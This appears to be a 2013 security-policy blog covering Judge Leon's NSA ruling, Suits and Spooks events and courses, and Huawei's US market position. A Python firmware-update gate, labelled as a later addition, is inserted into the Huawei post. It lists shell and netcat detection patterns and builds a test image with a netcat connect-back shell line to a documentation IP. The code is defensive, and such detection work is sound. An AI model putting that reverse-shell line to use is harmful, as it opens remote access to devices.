Wednesday, December 18, 2013

Judge Leon's Three Key Findings Against the NSA that Prompted those Exclamation Points

“He’s very passionate; he uses a lot of italics and exclamation points,” Orin S. Kerr, a professor at the George Washington University Law School and a defender of the N.S.A.’s surveillance programs, said, referring to the way Judge Leon wrote the decision. Mr. Kerr said he found the judge’s ruling short “on legal reasoning.” (source: The New York Times)
There are several exclamation points in this decision. Judge Leon plainly feels that he has been lied to, and that we all have been. And he seems to be done with it. (source: The New Yorker)
Considering the above comments about Judge Leon's use of exclamation points, I thought it might be interesting to see what prompted them. I read his 68 page decision, and found that Judge Leon used exclamation points three times. Here are those instances.

1(a). Plaintiffs Have Standing to Challenge Bulk Telephony Metadata Collection and Analysis.

"The Government argues that Judge Vinson's order names only Verizon Business Network Services ("VBNS") as the recipient of the order, whereas plaintiffs claim to be Verizon Wireless subscribers."

"Put simply, the Government wants it both ways. Virtually all of the Government's briefs and arguments to this Court explain how the Government has acted in good faith to create a comprehensive metadata database... - in which case the NSA must have collected metadata from Verizon Wireless, the single largest wireless carrier in the United States, as well as AT&T and Sprint, the second and third-largest carriers."

"Yet in one footnote, the Government asks me to find that plaintiffs lack standing based on the theoretical possibility that the NSA has collected a universe of metadata so incomplete that the program could not possibly serve its putative function. Candor of this type defies common sense and does not exactly inspire confidence!" (p. 38)

2. The Collection and Analysis of Telephony Metadata Constitutes a Search.

"First, the pen register in Smith was operational for only a matter of days between March 6, 1976 and March 19, 1976, and there is no indication from the Court's opinion that it expected the Government to retain those limited phone records once the case was over.

"In his affidavit, Acting Assistant Director of the FBI Robert J. Holley himself noted that "[p]en-register and trap-and-trace (PR/TT) devices provide no historical contact information, only a record of contacts with the target occurring after the devices have been installed."

"This short-term, forward-looking (as opposed to historical), and highly-limited data collection is what the Supreme Court was assessing in Smith. The NSA telephony metadata program, on the other hand, involves the creation and maintenance of a historical database containing five years' worth of data."

"And, I might add, there is the very real prospect that the program will go on for as long as America is combatting terrorism, which realistically could be forever!" (p. 47)

3. The Public Interest and Potential Injury to Other Interested Parties Also Weigh in Favor of Injunctive Relief.

"("[T]he public interest lies in enjoining unconstitutional searches.") That interest looms large in this case, given the significant privacy interests at stake and the unprecedented scope of the NSA's collection and querying efforts, which likely violate the Fourth Amendment. Thus, the public interest weighs heavily in favor of granting an injunction."

"The Government responds that the public's interest in combating terrorism is of paramount importance - a proposition that I accept without question. But the Government offers no real explanation as to how granting relief to these plaintiffs would be detrimental to that interest. Instead the Government says that it will be burdensome to comply with any order that requires the NSA to remove plaintiffs from its database."

"Of course, the public has no interest in saving the Government from the burdens of complying with the Constitution!" (p. 65-66)


Here's the full opinion. It's well worth reading. The fact is that our interaction with and reliance upon technology has fundamentally changed what privacy means to us today, and it will certainly change even more tomorrow. Court decisions from 30 or more years ago, which still inform the laws protecting our Fourth Amendment rights, should be revisited and updated to meet today's reality of instant communication, geolocation, and data analytics.

Sunday, December 8, 2013

If You Missed Suits and Spooks NY, Here It Is On Video

O'Reilly Media, the publisher of my book Inside Cyber Warfare, has produced a video compilation of our Suits and Spooks event. I'm proud to say that this is the first non-O'Reilly conference that they have produced for sale, and it looks great. It doesn't include every speaker because some of the talks were held under the Chatham House Rule, but here are the speakers that are included:
  • The Top 50 Non-state Hacker Groups in the World - Christopher Ahlberg (CEO of RecordedFuture)
  • Out of the Mountains: A Future of Feral Cities, Urban Systems Under Stress, and Increasing Overlaps Between the Real and Virtual Worlds - David Kilcullen (CEO of Caerus Associates)
  • Emerging Bad Actors in the Virtual and Physical Worlds (Jeffrey Carr, Moderator with Dr. David Kilcullen, Jonathan Hutson, Thomas Dzieran, Aaron Weisburd, Peter Mattis, and John Scott-Railton)
  • How to Survive a Surveillance-friendly Environment - Mike Janke (Co-founder, CEO of Silent Circle)
  • Should Defensive Strategies be Specific to the Threat Actor or Generalized for all Threat Actors? (Jeffrey Carr, Moderator with Pierre-Marc Bureau (ESET), Derek Manky (Fortinet), Roel Schouwenberg (Kaspersky), Chris Coleman (LookingGlass), Brian Carrier (Basis Technology))
  • Real-time Depiction of the Global Cyber Threat Landscape - Chris Coleman
  • Icefog: Mercenary Hackers Who Focus on Supply Chain Attacks in Asia - Roel Schouwenberg
  • Joseph Kony, the LRA and Elephant Poaching in Africa - Jonathan Hutson
The complete series is only $149. Here's where to order. We're going to be offering this again for Suits and Spooks DC so please let me know what you think.

Tuesday, December 3, 2013

Three Suits and Spooks Courses taught by 3 World-Renowned Experts: Limited Enrollment and Savings!

At Suits and Spooks events, we always have world-class speakers. But for 2014, I wanted to offer world-class training as well. For example, in January we're featuring:

CARMEN MEDINA: Specialist Leader at Deloitte Consulting LLP after retiring from an almost 32-year career at the Central Intelligence Agency, where her roles included Director of the Center for the Study of Intelligence (CSI), Deputy Director for Intelligence, and Chief of the Strategic Assessments Group in the Office of Transnational Issues, Directorate of Intelligence. She has led analysts working on Southern Africa and Central America, and helped to design the Global Coverage Program and innovate new production methods to support policymakers. In the early 1990s, she served overseas in Western Europe.

Course title: "Analytic Methodology and Critical Thinking for Cyber Intelligence and Information Security"

LANCE COTTRELL: Chief Scientist at Ntrepid Corp. and the founder and principal at Obscura Security. He founded Anonymizer Inc. in 1995, and is an internationally recognized expert in cryptography‚ online privacy‚ and Internet security.

Course title: "Tools, Techniques, and Pitfalls in Internet Anonymity and Pseudonymity"

ROB DUBOIS: Security advisor, smart power authority and retired U.S. Navy SEAL with experience in more than thirty nations. He recently served as the operations manager for the Department of Defense Red Team where his innovative tactics earned him the reputation of the U.S.’s “top terrorist”. Rob has provided his “Think like the Adversary” workshop to elite military units in combat zones, Fortune 500 companies, and agencies including the National Counterterrorism Center.

Course title: "Better Red than Dead: Learn to build your own full-spectrum Red Team with a veteran Red Team leader"

Originally, in order to attend a workshop you needed to also register for the conference. I've changed that policy so now you can take the training without having to register for Suits and Spooks DC, or you can register for both. Basically, it's now your choice.

Finally, to help us fill these courses and get a meaningful test of whether training is something we should continue to offer at Suits and Spooks events, I've lowered the tuition by 33% on all 3 courses until December 20th.

You can get complete details on each course by clicking on the course title, or call us with any questions you may have. Please help spread the word about this unique opportunity to learn from these highly esteemed professionals. Depending on our enrollment numbers, it may be the only time that we offer it.

Monday, December 2, 2013

What Does Huawei's Announcement of Exiting the U.S. Market Really Mean?

Last night, my Google Alert for Huawei captured an intriguing headline: "Huawei exiting US market: CEO". The article appeared in Global Times, a Chinese paper that's part of Peoples Daily. Here's the opening paragraph:
Chinese telecommunications equipment maker Huawei Technologies Co Ltd has exited the US market in order not to affect Sino-US relations, Ren Zhengfei, founder and CEO of Huawei, said in an interview in Paris, news portal reported Sunday.
Upon first reading, this raised a lot of questions in my mind regarding Huawei's current U.S. operations. It has offices in a number of U.S. cities and has already sold quite a bit of equipment to both U.S. corporations and the U.S. government. What would happen there, I wondered?

Fortunately, I was able to reach Bill Plummer, Huawei's VP of External Affairs by email and received the following clarification:
Huawei has prioritized markets that welcome competition and investment, such as Europe.  
That said, we remain committed to our customers, employees, investments and operations and more than $1 billion in sales in the U.S., and we stand ready to deliver additional competition and innovative solutions as desired by customers and allowed by authorities.
So basically what seemed like a radical change of strategy is actually something very practical. Huawei isn't pulling out of the U.S. physically nor is it abandoning its current U.S. customers. It is simply re-allocating its resources to increase sales in those parts of the world where it is welcome to compete.

Personally, as someone who has been a frequent critic of Huawei, I think it's a smart strategy. They're already the world's largest telecommunications hardware manufacturer. Why should they risk engendering more controversy by continuing to battle against U.S. government resistance when it will do nothing to improve their bottom line? In my opinion, Huawei's combination of low prices and quality manufacturing will eventually force adoption by U.S. corporations and government agencies. It might take years but I think that will be the inevitable outcome.

In the meantime, instead of hoping that the U.S. government will keep potential adversary states from selling them risky devices, U.S. companies should incentivize cyber security researchers to find ways to automatically test firmware updates for malicious code and exploitable flaws before they are installed. Currently, whether the hardware is made by Huawei, ZTE, or Dell, firmware updates are loaded automatically with no independent testing. If, down the road, a foreign intelligence agency (Chinese or otherwise) wants to compromise a strategically placed router made by a company it has legal authority over, slipping a bit of malicious code into a firmware update is one of the easiest ways to do it.
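What an automatic pre-installation gate for firmware updates could look like, as an added example that is not part of the original post and not code from Huawei, ZTE, Dell or O'Reilly. It does two things: it verifies the candidate image against an out-of-band hash and a signature, and it diffs the printable strings in the candidate against the image currently deployed, refusing automatic installation when anything new looks like remote-access tooling. The second stage matters for exactly the threat described above: a vendor acting under legal compulsion can produce a perfectly valid signature, so signature checking alone does not help. The firmware images, the signing key (an HMAC standing in for the vendor's asymmetric signature) and the suspicious-string patterns are all constructed for the demo and are assumptions, not anything from a real vendor.

```python
"""Added example: a pre-deployment gate for router firmware images (not vendor code).

Assumptions: the expected hash and signature come from a vendor release manifest
obtained out of band; HMAC-SHA256 with DEMO_KEY stands in for the vendor's real
asymmetric signature; the images below are constructed byte strings, not real firmware.
"""
import hashlib
import hmac
import re
from dataclasses import dataclass, field

STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")  # runs of 6+ printable ASCII bytes

# Patterns that should stop an automatic install and route the image to a human.
SUSPICIOUS = [
    (re.compile(rb"/bin/(?:ba)?sh\b"), "shell interpreter reference"),
    (re.compile(rb"\b(?:nc|netcat|telnetd)\b"), "network listener/connect-back tool"),
    (re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b"), "hard-coded IPv4 address"),
    (re.compile(rb"https?://"), "hard-coded URL"),
    (re.compile(rb"\b(?:passwd|password|root:)"), "credential-looking string"),
]

DEMO_KEY = b"demo-vendor-signing-key"  # assumption: stands in for vendor key material
_HDR = b"FWIMG" + bytes([0, 4, 1])
_PAD = bytes(range(32)) * 4            # non-printable filler, not code

# Constructed images: the deployed one, a clean update, and the same update with a
# backdoor appended (203.0.113.5 is a documentation-only address, TEST-NET-3).
PREVIOUS_IMAGE = (_HDR + b"\nversion 4.1.2\nntp server pool.ntp.org\n"
                  b"syslog host loghost.example\n" + _PAD)
CANDIDATE_GOOD = (_HDR + b"\nversion 4.1.3\nntp server pool.ntp.org\n"
                  b"syslog host loghost.example\nsnmp community readonly\n" + _PAD)
CANDIDATE_BAD = CANDIDATE_GOOD + b'\n/bin/sh -c "nc 203.0.113.5 4444"\n'


@dataclass
class GateResult:
    allowed: bool
    reasons: list = field(default_factory=list)
    new_strings: list = field(default_factory=list)


def sha256hex(image: bytes) -> str:
    return hashlib.sha256(image).hexdigest()


def vendor_sign(image: bytes, key: bytes = DEMO_KEY) -> bytes:
    """Demo stand-in for the vendor's detached signature (assumption: HMAC, not RSA/ECDSA)."""
    return hmac.new(key, image, hashlib.sha256).digest()


def hash_ok(image: bytes, expected_sha256_hex: str) -> bool:
    return hmac.compare_digest(sha256hex(image), expected_sha256_hex)


def signature_ok(image: bytes, key: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(vendor_sign(image, key), tag)


def extract_strings(image: bytes) -> set:
    return {m.group(0) for m in STRING_RE.finditer(image)}


def diff_strings(previous: bytes, candidate: bytes) -> list:
    """Strings present in the candidate but not in the deployed image, with any flags."""
    new = sorted(extract_strings(candidate) - extract_strings(previous))
    return [(s, [label for pat, label in SUSPICIOUS if pat.search(s)]) for s in new]


def gate(previous: bytes, candidate: bytes, expected_sha256_hex: str,
         key: bytes, tag: bytes) -> GateResult:
    """Decide whether a candidate image may be installed without human review."""
    res = GateResult(allowed=True)
    if not hash_ok(candidate, expected_sha256_hex):
        res.allowed = False
        res.reasons.append("sha256 mismatch against out-of-band manifest")
    if not signature_ok(candidate, key, tag):
        res.allowed = False
        res.reasons.append("signature does not verify")
    for s, hits in diff_strings(previous, candidate):
        res.new_strings.append(s)
        if hits:  # validly signed but suspicious content still blocks auto-install
            res.allowed = False
            res.reasons.append(f"new string {s!r}: {', '.join(hits)}")
    return res


def demo() -> dict:
    """Run the gate over the three constructed scenarios."""
    good_tag = vendor_sign(CANDIDATE_GOOD)
    bad_tag = vendor_sign(CANDIDATE_BAD)  # a coerced vendor signs the backdoored build too
    tampered = bytearray(CANDIDATE_GOOD)
    tampered[-1] ^= 0xFF                  # one byte flipped in transit
    tampered = bytes(tampered)
    return {
        "good": gate(PREVIOUS_IMAGE, CANDIDATE_GOOD, sha256hex(CANDIDATE_GOOD), DEMO_KEY, good_tag),
        "vendor_backdoored": gate(PREVIOUS_IMAGE, CANDIDATE_BAD, sha256hex(CANDIDATE_BAD), DEMO_KEY, bad_tag),
        "tampered_in_transit": gate(PREVIOUS_IMAGE, tampered, sha256hex(CANDIDATE_GOOD), DEMO_KEY, good_tag),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "ALLOW" if result.allowed else "BLOCK", result.reasons)
```

Run it and the clean update is allowed, the in-transit tampering is caught by the hash and signature checks, and the vendor-signed backdoor is blocked only by the string diff. A real pipeline would go further than strings: unpack the image, diff the filesystem and binaries against the last release, and execute the update in an emulator before it ever touches a production router. The point the example makes is that the signature check, which is all most auto-update mechanisms do, is the one check a compromised or compelled vendor can always pass.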

As a side note I'm happy to say that both Bill Plummer and Andy Purdy (Huawei's CSO) will be at Suits and Spooks DC. Andy will be speaking on a panel that I'm moderating which will explore cyber security risks in the supply chain. We still have about 28 seats available if you'd like an opportunity to discuss Huawei and related cyber security issues with a couple of the company's executives face-to-face.